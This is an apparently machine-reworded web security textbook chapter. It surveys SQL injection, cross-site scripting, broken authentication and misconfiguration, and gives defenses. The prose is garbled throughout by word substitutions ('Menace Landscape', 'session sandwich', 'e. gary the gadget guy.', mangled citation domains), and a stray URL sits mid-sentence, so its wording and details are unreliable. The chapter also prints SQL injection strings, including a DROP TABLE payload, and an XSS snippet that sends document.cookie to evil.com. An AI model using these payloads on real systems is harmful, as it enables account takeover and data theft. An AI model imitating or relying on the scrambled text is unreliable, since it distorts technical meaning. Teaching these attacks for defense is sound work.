Menace Landscape and Standard Vulnerabilities

# Chapter 4: Threat Landscape and even Common Vulnerabilities
Every application operates throughout a place full involving threats – malicious actors constantly looking for weaknesses to exploit. Understanding the threat landscape is vital for defense. In  https://docs.shiftleft.io/sast/ui-v2/reporting , we'll survey the nearly all common forms of software vulnerabilities and episodes seen in the wild today. We will discuss how they work, provide real-life examples of their écrasement, and introduce ideal practices in order to avoid them. This will place the groundwork at a later time chapters, which may delve deeper into how to construct security directly into the development lifecycle and specific defenses.

Over the years, certain categories of vulnerabilities have surfaced as perennial difficulties, regularly appearing in security assessments in addition to breach reports. Sector resources like the OWASP Top 10 (for web applications) and even CWE Top 25 (common weaknesses enumeration) list these normal suspects. Let's discover some of the major ones:

## Injection Attacks (SQL, Command Injection, and many others. )
- **Description**: Injection flaws arise when an program takes untrusted input (often from the user) and enters it into a great interpreter or command in a manner that alters the intended execution. Typically the classic example will be SQL Injection (SQLi) – where consumer input is concatenated into an SQL query without proper sanitization, allowing you utilize their own SQL commands. Similarly, Control Injection involves treating OS commands, LDAP Injection into LDAP queries, NoSQL Injection in NoSQL directories, and so in. Essentially, the application does not work out to distinguish information from code guidelines.

- **How it works**: Consider a simple login contact form that takes a good username and password. If typically the server-side code naively constructs a query such as: `SELECT * BY users WHERE username = 'alice' AND EVEN password = 'mypassword'; `, an attacker can input something like `username: alice' OR '1'='1` and `password: anything`. The resulting SQL would be: `SELECT * COMING FROM users WHERE user name = 'alice' OR EVEN '1'='1' AND password = 'anything'; `. The `'1'='1'` issue always true may make the issue return all customers, effectively bypassing typically the password check. This specific is a basic sort of SQL injections to force the login.
More maliciously, an attacker can terminate the question and add `; LOWER TABLE users; --` to delete typically the users table (a destructive attack about integrity) or `; SELECT credit_card COMING FROM users; --` to dump sensitive data (a confidentiality breach).
- **Real-world impact**: SQL injection offers been behind a number of the largest data removes on record. We mentioned the Heartland Payment Systems infringement – in 08, attackers exploited an SQL injection in a web application to ultimately penetrate interior systems and grab millions of credit card numbers​
TWINGATE. COM
. Another circumstance: the TalkTalk 2015 breach in the UK, where a teenager applied SQL injection to get into the personal info of over one hundred and fifty, 000 customers. The particular subsequent investigation uncovered TalkTalk had remaining an obsolete webpage with an identified SQLi flaw on-line, and hadn't patched a database weakness from 2012​
ICO. ORG. UK
​
ICO. ORG. UK
. TalkTalk's CEO identified it as the basic cyberattack; certainly, SQLi was well-understood for a decade, yet the company's failure to sanitize inputs and up-date software triggered a serious incident – they were fined and suffered reputational loss.
These illustrations show injection problems can compromise confidentiality (steal data), honesty (modify or remove data), and availableness (if data is wiped, service is disrupted). Even right now, injection remains the common attack vector. In fact, OWASP's 2021 Top 10 still lists Shot (including SQL, NoSQL, command injection, and so forth. ) being a best risk (category A03: 2021)​
IMPERVA. CONTENDO
.
- **Defense**: The particular primary defense in opposition to injection is input validation and outcome escaping – ensure that any untrusted info is treated mainly because pure data, never ever as code. Using prepared statements (parameterized queries) with destined variables is the gold standard for SQL: it divides the SQL computer code from your data beliefs, so even if an user makes its way into a weird chain, it won't split the query framework. For example, utilizing a parameterized query inside Java with JDBC, the previous get access query would turn out to be `SELECT * FROM users WHERE login name =? AND username and password =? `, plus the `? ` placeholders are certain to user inputs safely and securely (so `' OR EVEN '1'='1` would end up being treated literally because an username, which often won't match virtually any real username, somewhat than part involving SQL logic). Similar approaches exist with regard to other interpreters.
About top of that will, whitelisting input validation can restrict what characters or file format is allowed (e. g., an user name could be restricted to alphanumeric), stopping a lot of injection payloads from the front door​
IMPERVA. COM
. Also, encoding output effectively (e. g. HTML CODE encoding to avoid script injection) is key, which we'll cover under XSS.
Developers should in no way directly include natural input in directions. Secure frameworks plus ORM (Object-Relational Mapping) tools help simply by handling the problem building for you. Finally, least privilege helps mitigate influence: the database account used by the particular app should have got only necessary liberties – e. g. it will not have got DROP TABLE protection under the law if not needed, to prevent a good injection from doing irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting identifies a class of vulnerabilities where an application includes malicious canevas inside the context of a trusted website. Unlike injection into a server, XSS is about treating in the content that others see, typically in the web web page, causing victim users' browsers to implement attacker-supplied script. Right now there are a couple of types of XSS: Stored XSS (the malicious script will be stored on the server, e. gary the gadget guy. in the database, and even served to other users), Reflected XSS (the script is usually reflected off the storage space immediately in the reaction, often via a look for query or mistake message), and DOM-based XSS (the weakness is in client-side JavaScript that insecurely manipulates the DOM).

- **How that works**: Imagine a message board where users can post comments. If the application does not sanitize HTML CODE tags in responses, an attacker could post a review like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any end user who views that will comment will inadvertently run the software in their web browser. The script over would send typically the user's session sandwich to the attacker's server (stealing their own session, hence enabling the attacker to be able to impersonate them in the site – a confidentiality plus integrity breach).
Inside a reflected XSS circumstance, maybe the site shows your suggestions on an error webpage: in case you pass a script in the particular URL and the web-site echoes it, this will execute inside the browser of the person who clicked that malicious link.
Essentially, XSS turns the victim's browser into a good unwitting accomplice.
instructions **Real-world impact**: XSS can be really serious, especially in highly trusted web sites (like internet sites, webmail, banking portals). Some sort of famous early example of this was the Samy worm on Bebo in 2005. An individual can named Samy uncovered a stored XSS vulnerability in Bebo profiles. He created a worm: some sort of script that, whenever any user seen his profile, it would add him or her as a good friend and copy the script to the particular viewer's own profile. This way, anyone else viewing their profile got infected also. Within just thirty hours of launch, over one million users' profiles got run the worm's payload, making Samy one of many fastest-spreading malware coming from all time​
SOBRE. WIKIPEDIA. ORG
. The worm itself merely displayed the key phrase "but most regarding all, Samy is usually my hero" upon profiles, a comparatively harmless prank​
DURANTE. WIKIPEDIA. ORG
. However, it had been a wake-up call: if a great XSS worm could add friends, it could just simply because quickly create stolen private messages, spread junk, or done other malicious actions about behalf of users. Samy faced lawful consequences for this specific stunt​
EN. WIKIPEDIA. ORG
.
In an additional scenario, XSS could be used to be able to hijack accounts: for instance, a resembled XSS inside a bank's site could be taken advantage of via a phishing email that tips an user in to clicking an WEB LINK, which then completes a script to transfer funds or perhaps steal session bridal party.
XSS vulnerabilities experience been seen in internet sites like Twitter, Myspace (early days), plus countless others – bug bounty programs commonly receive XSS reports. Although many XSS bugs are involving moderate severity (defaced UI, etc. ), some can be important if they allow administrative account takeover or deliver viruses to users.
rapid **Defense**: The essence of XSS security is output encoding. Any user-supplied content material that is viewed inside a page should be properly escaped/encoded so that that can not be interpreted as active script. Regarding example, if an user writes ` bad() ` in a remark, the server need to store it then output it while `< script> bad()< /script> ` thus that it is found as harmless text, not as a good actual script. Modern web frameworks generally provide template search engines that automatically escape variables, which inhibits most reflected or perhaps stored XSS by simply default.
Another important defense is Articles Security Policy (CSP) – a header that instructs browsers to only execute intrigue from certain sources. A well-configured CSP can mitigate the particular impact of XSS by blocking inline scripts or outside scripts that aren't explicitly allowed, even though CSP may be sophisticated to set up without affecting blog functionality.
For developers, it's also critical to stop practices want dynamically constructing HTML CODE with raw data or using `eval()` on user input in JavaScript. Internet applications can in addition sanitize input to strip out disallowed tags or characteristics (though this is complicated to get perfect). In summary: confirm and sanitize any HTML or JavaScript inputs, use context-appropriate escaping (HTML get away for HTML content, JavaScript escape with regard to data injected straight into scripts, etc. ), and consider permitting browser-side defenses want CSP.

## Busted Authentication and Treatment Managing
- **Description**: These vulnerabilities require weaknesses in exactly how users authenticate to be able to the application or perhaps maintain their authenticated session. "Broken authentication" can mean various issues: allowing weakened passwords, not avoiding brute force, declining to implement correct multi-factor authentication, or even exposing session IDs. "Session management" will be closely related – once an end user is logged inside of, the app generally uses a session cookie or expression to keep in mind them; when that mechanism is definitely flawed (e. grams. predictable session IDs, not expiring sessions, not securing typically the cookie), attackers might hijack other users' sessions.

- **How it works**: 1 common example is definitely websites that made overly simple pass word requirements or acquired no protection towards trying many passwords. Attackers exploit this by using abilities stuffing (trying username/password pairs leaked from the other sites) or incredible force (trying many combinations). If there will be no lockouts or perhaps rate limits, a good attacker can systematically guess credentials.
One other example: if the application's session sandwich (the part of info that identifies some sort of logged-in session) is not marked together with the Secure flag (so it's sent over HTTP as effectively as HTTPS) or even not marked HttpOnly (so it can easily be accessible to scripts), it could be lost via network sniffing or XSS. When an attacker offers a valid treatment token (say, thieved from an unconfident Wi-Fi or by means of an XSS attack), they could impersonate that will user without needing credentials.
There have also been reason flaws where, with regard to instance, the password reset functionality is certainly weak – might be it's susceptible to an attack where the attacker can reset someone else's pass word by modifying guidelines (this crosses straight into insecure direct object references / access control too).
Total, broken authentication masks anything that allows an attacker in order to either gain credentials illicitly or sidestep the login making use of some flaw.
rapid **Real-world impact**: We've all seen information of massive "credential dumps" – millions of username/password pairs floating around coming from past breaches. Assailants take these and try them on the subject of other services (because lots of people reuse passwords). This automated credential stuffing has guided to compromises of high-profile accounts on the subject of various platforms.
An example of broken auth was your case in 2012 where LinkedIn endured a breach in addition to 6. 5 mil password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. CONTENDO
​
NEWS. SOPHOS. COM
. The weak hashing meant opponents cracked most regarding those passwords inside hours​
NEWS. SOPHOS. COM
​
NEWS. SOPHOS. COM
. Even worse, a few years later it turned out the breach was actually much larger (over a hundred million accounts). People often reuse account details, so that breach had ripple outcomes across other web sites. LinkedIn's failing has been in cryptography (they didn't salt or even use a robust hash), which will be section of protecting authentication data.
Another common incident type: session hijacking. For case in point, before most web sites adopted HTTPS almost everywhere, attackers about the same network (like a Wi-Fi) could sniff cookies and impersonate consumers – a danger popularized by the Firesheep tool in 2010, which let anyone eavesdrop on unencrypted sessions for sites love Facebook. This forced web services in order to encrypt entire lessons, not just sign in pages.
There are also cases of mistaken multi-factor authentication implementations or login bypasses due to logic errors (e. gary the gadget guy., an API of which returns different communications for valid versus invalid usernames can allow an assailant to enumerate consumers, or possibly a poorly integrated "remember me" expression that's easy in order to forge). The consequences associated with broken authentication usually are severe: unauthorized entry to user balances, data breaches, personality theft, or not authorized transactions.
- **Defense**: Protecting authentication takes a multi-pronged approach:
instructions Enforce strong username and password policies but within just reason. Current NIST guidelines recommend permitting users to pick long passwords (up to 64 chars) rather than requiring repeated changes unless there's indication of compromise​
JUMPCLOUD. COM
​
AUDITBOARD. COM
. Rather, check passwords in opposition to known breached password lists (to refuse "P@ssw0rd" and typically the like). Also encourage passphrases that are simpler to remember although hard to estimate.
- Implement multi-factor authentication (MFA). A new password alone is often insufficient these types of days; providing a choice (or requirement) to get a second factor, as an one-time code or a push notification, greatly reduces the chance of account compromise even if account details leak. Many main breaches could have got been mitigated by simply MFA.
- Safe the session bridal party. Use the Safe flag on pastries so they are usually only sent more than HTTPS, HttpOnly so they aren't obtainable via JavaScript (mitigating some XSS impact), and consider SameSite to prevent all of them from being directed in CSRF attacks (more on CSRF later). Make session IDs long, randomly, and unpredictable (to prevent guessing).
-- Avoid exposing treatment IDs in Web addresses, because they could be logged or leaked out via referer headers. Always prefer snacks or authorization headers.
- Implement consideration lockout or throttling for login attempts. After say five to ten failed attempts, possibly lock the be the cause of a period or increasingly delay responses. Utilize CAPTCHAs or other mechanisms if automated attempts usually are detected. However, be mindful of denial-of-service – some web pages opt for better throttling to steer clear of letting attackers fasten out users by trying bad passwords repeatedly.
- Program timeout and logout: Expire sessions following a reasonable period regarding inactivity, and completely invalidate session tokens on logout. It's surprising how many apps in typically the past didn't properly invalidate server-side treatment records on logout, allowing tokens being re-used.
- Be aware of forgot password goes. Use secure bridal party or links via email, don't uncover whether an end user exists or not (to prevent user enumeration), and ensure those tokens expire quickly.
Modern frames often handle a new lot of this particular for you personally, but misconfigurations are normal (e. h., a developer may accidentally disable some sort of security feature). Standard audits and checks (like using OWASP ZAP or other tools) can get issues like missing secure flags or even weak password guidelines.
Lastly, monitor authentication events. Unusual habits (like an individual IP trying 1000s of usernames, or one bank account experiencing hundreds of unsuccessful logins) should raise alarms. This terme conseillé with intrusion diagnosis.
To emphasize, OWASP's 2021 list phone calls this category Recognition and Authentication Problems (formerly "Broken Authentication") and highlights the importance of things such as MFA, not applying default credentials, and implementing proper username and password handling​
IMPERVA. APRESENTANDO
. They note that 90% of apps tested had challenges in this area in a few form, quite mind boggling.

## Security Misconfiguration
- **Description**: Misconfiguration isn't a single weeknesses per se, yet a broad school of mistakes inside configuring the app or its surroundings that lead to insecurity. This could involve using default credentials or options, leaving unnecessary benefits enabled, misconfiguring security headers, delete word hardening the server. Basically, the software may be secure in principle, nevertheless the way it's deployed or configured opens a pit.

- **How it works**: Examples of misconfiguration:
- Causing default admin accounts/passwords active. Many software packages or products historically shipped along with well-known defaults